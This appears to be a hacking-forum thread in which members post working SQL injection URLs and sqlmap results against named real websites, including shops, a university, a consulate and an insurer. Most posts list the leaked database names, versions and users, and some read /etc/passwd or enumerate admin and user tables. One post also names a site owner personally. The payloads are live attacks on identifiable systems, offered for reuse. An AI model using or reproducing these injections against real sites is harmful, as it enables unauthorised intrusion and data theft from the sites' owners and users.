SQL Injections

Discussion in 'Vulnerabilities' started by yarbabin, 27 Apr 2015.

  1. BenderMR

    stanok
    Code:
    http://stanok.in.ua/details.php?id=-21292%20union%20select%201,2,3,4,5,6,7,8,9,concat_ws(0x7c,database(),version(),user()),11,12,13,14,15,16,17,18,19,20
    ininterne1_stan|5.5.42-log|[email protected]

    some Spanish shop
    Code:
    http://tecnicellmaracaibo.com/product.php?id=-175%27%20uNiOn%20SeLeCt%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13--+-
    
    tecni_sitio|5.6.43|tecni@localhost
     
    1. BenderMR

      Code:
      http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,concat_ws(0x7c,database(),version(),user()),12,13,14,15,16,17,18,19,20,21--+-&type=2
      
      db_eircicai|5.5.51|koresoft@localhost

      and XSS right here too
      Code:
      http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,%3Cscript%3Ealert(%27xss/sqli%27)%3C/script%3E,12,13,14,15,16,17,18,19,20,21--+-&type=2
      
       
      1. BabaDook

        This is called SiXSS
         
        erwerr2321 likes this.
        1. sepo

          Code:
          http://www.vepakistan.com/detail.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),database(),user()),19,20--
           
          BabaDook likes this.
          1. DezMond™

            Code:
            http://www.fc-utd.co.uk/report.php?match_id=-1901+union+select+user()+--+
             
            BabaDook likes this.
            1. WallHack

              Code:
              http://www.kaspiy.az/news.php?id=-103085 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -
               
              BenderMR likes this.
              1. RedHazard

                Code:
                https://reference-audio-analyzer.pro/review-report.php?id=1691' AND (SELECT 3106 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(3106=3106,1))),0x717a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Pzbc'='Pzbc
                 
                BenderMR likes this.
                1. BenderMR

                  MegaKeys.RU
                  Code:
                  https://megakeys.ru/soft/product.php?id_d=1972300%27%20union%20select%201,2,3,4,5,6,7,concat_ws(%27|%27,%20database(),user(),version()),9,10--+-#&rtype=good&page=9
                   
                  RedHazard likes this.
                  1. sepo

                    Code:
                    http://www.semsk.kz/newscat.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())+--+
                     
                    BenderMR likes this.
                    1. BenderMR

                      BChainHacks
                      Code:
                      https://www.bchainhacks.com/event.php?id=-122%20%20UNION%20ALL%20SELECT%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
                      bchain_live|10.2.24-MariaDB|bchain_live_user@localhost
                       
                      1. Baskin-Robbins

                        Code:
                        www.all-guitar-chords.com/topic.php?id=-4794' union all select concat_ws(0x23,version(),database(),user(),load_file('/etc/passwd')),2,3,4,5,6,7,8,9,10,group_concat(concat_ws(0x3a3a,host,user,file_priv,insert_priv,update_priv) SEPARATOR " ") FROM mysql.user --%20
                        
                        5.5.52-MariaDB
                        Code:
                        https://www.txdirectory.com/online/abc/detail.php?id=217 union select concat_ws(0x3a3a,version(),user(),database(),group_concat(table_name separator " ")),2,3,4 from information_schema.tables where table_schema=database() --%20
                        
                        5.5.61-0ubuntu0.14.04.1-log
                        Code:
                        https://www.hotelnewsresource.com/go.php?id=-1298989163' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(substring(concat_ws(0x23,version(),(select schema_name from information_schema.schemata limit 3,1),(select file_priv from mysql.user where user='root' and host='localhost'),0x23), 1), floor(rand(0)*2))) --%20
                        
                        5.5.60-MariaDB
                         
                        1. Pop-Xlop

                          curl http://bitcoin-office.com/globalscape-register-miner-contract.php --data "worker=azaza'and(extractvalue(1,concat(0x3b,(select/**/version()))))and'"

                          Error: XPATH syntax error: ';10.1.41-MariaDB-cll-lve'
                          :)
                           
                          Gorev likes this.
                          1. Pop-Xlop

                            https://sarov.info Колючий Саров, Yandex IKS (formerly tIC) 3600

                            Several SQL injections.
                            The first:
                            Code:
                            https://sarov.info/phones/yp/index.php?cat=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3+--+1
                            
                            [email protected]:5.6.38:admin_bbnews
                            The second:
                            Code:
                            curl https://sarov.info/bills/np/doubles.php --data "bill_id%5B1401653 and extractvalue(1,concat(0x3b,(select(version()))))%23%5D=on&delform=1" -H "Authorization: Basic a29sc2FyOmlsZW5hc2Fy"
                            
                            XPATH syntax error: ';5.6.38'
                            The owner of the resource, Kirill Astashov aka BadBlock, is known in the Nizhny Novgorod region as a fighter against extremism in comments, with subsequent reports to Center "E".
                             
                            1. Baskin-Robbins

                              Code:
                              https://www.6-movies.com/category.php?id=28 union select 1,2,concat_ws(0x3a3a,version(),user(),group_concat(column_name)),4,5,6,7 from information_schema.columns where table_name='chatusers' and table_schema='NauGerComDB2' --%20
                              
                              5.5.55-0+deb8u1
                              Code:
                              www.nwu.edu.bd/news_details.php?id=-37 '/*!50000union*/ /*!50000select*/ concat_ws(0x2323,version(),group_concat(table_name)),2 from /*!50000information_schema.tables where table_schema='nwuedu_web'*/ --%20
                              
                              5.6.41-84.1
                              Code:
                              www.tpmrotator.com/list.php?id=-2522' union select concat_ws(0x2323,version(),database(),user(),group_concat(table_name separator " ")) from information_schema.tables where table_schema=database() --%20
                              
                              5.5.60-MariaDB
                              Code:
                              www.asfaa.org/members.php?id=-14 union select 1,concat_ws(0x23,@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),3,group_concat(table_name separator " ") from information_schema.tables where table_schema=database() --%20
                              
                              5.6.36-82.0
                              Code:
                              https://www.testprepkart.com/sat/blog-single.php?id=-12' union select 1,group_concat(column_name separator " "),3,4,5,6,7,concat_ws(0x3a3a,version(),database(),user(),@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),9,10,11,12,13,14,15,16  from information_schema.columns where table_name='admin' and table_schema=database() --%20
                              
                              5.6.38
                              Code:
                              https://www.nhe-group.com/category.php?id=-31 '/*!50000union*/ /*!50000select*/ 1,2,3,4,group_concat(column_name),6,7,8,concat_ws(0x2323,version(),user(),0x2323),10,11,12,13,14,15 from /*!50000information_schema.columns where table_schema='ibrahim2_nhegroup' and table_name='admins'*/ --%20
                              
                              5.6.32-78.1
                              Code:
                              https://www.htrends.com/go.php?id=927823727' or (select count(*) from (select 1 union select 2 union select 3)b group by concat(mid(concat_ws(0x3a3a,version(),(select schema_name from information_schema.schemata limit 0,1)),1,63), floor(rand(0)*2))) --%20
                              
                              5.5.60-MariaDB
                              Code:
                              www.consuladoportugalgoa.com/pages.php?id=-2 union select 1,concat_ws(0x2323,version(),user(),@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),group_concat(column_name),4,5,6 from information_schema.columns where table_schema='consulad_con_pc' and table_name='users'--%20
                              
                              5.7.27
                              Code:
                              https://www.nitolinsurance.com/news_details.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3,group_concat(column_name) from information_schema.columns where table_schema='nitolins_website' and table_name='admin' --%20
                              
                              10.1.41-MariaDB
                              Code:
                              http://www.ssy.org/detail.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3,group_concat(cast(table_name as char)),(select cast(schema_name as char) from information_schema.schemata limit 0,1),6,7,8,9,10,11,12,13 from information_schema.tables where table_schema='ssy_datassy' --%20
                              
                              5.6.45
                              Code:
                              https://www.compassboxwhisky.com/blog/post-print.php?id=-19' union select 1,concat_ws(0x2323,version(),user()),3,4,5,(select file_priv from mysql.user where user='compassbox'),7,group_concat(table_name),9,10,11,12 from information_schema.tables where table_schema='compassbox'  --%20
                              
                              5.5.60-MariaDB
                              Code:
                              https://www.faithandpublicpolicy.org/news.php?id=-464' union select group_concat(table_name),concat_ws(0x2323,version(),user(),(select file_priv from mysql.user where user='webuser')),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema='sys'--%20
                              
                              5.7.25
                               
                              1. Arn0ld SHeremetev

                                Code:
                                http://www.ibins.ru/useful.php?id=-1%27union+select+1,version(),3,4,database()--+
                                
                                version:
                                5.6.25-73.1

                                Code:
                                https://www.russianspares.com/products.php?cat=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+

                                version
                                5.6.45


                                Code:
                                 https://www.wjhy.com.hk/en/product_detail.php?id=25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,VERSION(),18,19,20,21,22,23--+ 
                                version 5.5.40

                                 
                                #235 Arn0ld SHeremetev, 7 Sep 2019
                                Last edited: 8 Sep 2019
                                Gorev likes this.
                                1. WallHack

                                  Fragmented SQL injection in the spartak bux script; some pretty decent projects run on it.

                                  ||extractvalue(1,concat(0x3a,(select @@version)))#


                                  List of vulnerable sites: (more can be found)

                                  POST request (for hack bar)

                                  For beginners

                                   
                                  #236 WallHack, 3 Oct 2019
                                  Last edited: 7 Oct 2019
                                  BenderMR, ExQ, Gorev and 2 others like this.
                                  1. RWD

                                    glassofvenice.com
                                    online store
                                    lots of interesting stuff inside.

                                    Code:
                                    
                                    https://www.glassofvenice.com/landingpages.php?lp=murano-glass-beads&filters=36_10_38
                                    
                                    
                                    Parameter: lp (GET)
                                        Type: boolean-based blind
                                        Title: AND boolean-based blind - WHERE or HAVING clause
                                        Payload: lp=murano-glass-beads' AND 5931=5931 AND 'HFLm'='HFLm&filters=36_10_38
                                    
                                        Type: error-based
                                        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
                                        Payload: lp=murano-glass-beads' AND (SELECT 2228 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(2228=2228,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rqhj'='rqhj&filters=36_10_38
                                    
                                        Type: time-based blind
                                        Title: MySQL >= 5.0.12 AND time-based blind
                                        Payload: lp=murano-glass-beads' AND SLEEP(5) AND 'AqWz'='AqWz&filters=36_10_38
                                    
                                        Type: UNION query
                                        Title: Generic UNION query (NULL) - 9 columns
                                        Payload: lp=-8269' UNION ALL SELECT 53,53,53,53,53,53,CONCAT(0x717a6b7a71,0x4a61754d67545a515571454669416b6f567a4d68696c4c4b57546d4a4b4a434c7752545479434164,0x7171766b71),53,53-- lNAv&filters=36_10_38
                                    ---
                                    web server operating system: Linux Debian 9.0 (stretch)
                                    web application technology: Apache 2.4.25
                                    back-end DBMS: MySQL >= 5.0
                                    
                                    
                                    Database: glassdb
                                    [145 tables]
                                    
                                     
                                    spherics and BabaDook like this.
                                    1. karkajoi

                                      karkajoi Well-Known Member

                                      Joined:
                                      26 Oct 2016
                                      Messages:
                                      488
                                      Likes Received:
                                      459
                                      Reputations:
                                      8
                                      Is the DB encrypted?
                                       
                                      1. RWD

                                        RWD Member

                                        Joined:
                                        25 Apr 2013
                                        Messages:
                                        157
                                        Likes Received:
                                        41
                                        Reputations:
                                        2
                                        fantasycruncher.com
                                        A sports-themed site; privileges to read the MySQL passwords and all databases

                                        Code:
                                        https://www.fantasycruncher.com/cheatsheet.php?id=783b2c1a48b5b3e0
                                        
                                        Parameter: id (GET)
                                            Type: boolean-based blind
                                            Title: AND boolean-based blind - WHERE or HAVING clause
                                            Payload: id=783b2c1a48b5b3e0' AND 1291=1291 AND 'YNvr'='YNvr
                                        
                                            Type: time-based blind
                                            Title: MySQL >= 5.0.12 AND time-based blind
                                            Payload: id=783b2c1a48b5b3e0' AND SLEEP(5) AND 'KAys'='KAys
                                        ---
                                        
                                        web application technology: PHP 5.6.29, Nginx 1.10.1
                                        back-end DBMS: MySQL 5 (MariaDB fork)
                                        
                                        
                                         
                                        #239 RWD, 30 Oct 2019
                                        Last edited: 31 Oct 2019
                                        1. DezMond™

                                          DezMond™ Elder

                                          Joined:
                                          10 Jan 2008
                                          Messages:
                                          3,619
                                          Likes Received:
                                          432
                                          Reputations:
                                          234
                                          Code:
                                          http://www.wakecamp.ru/index.php?action=item&id=54+and+1=0+union+distinct+select+1,2+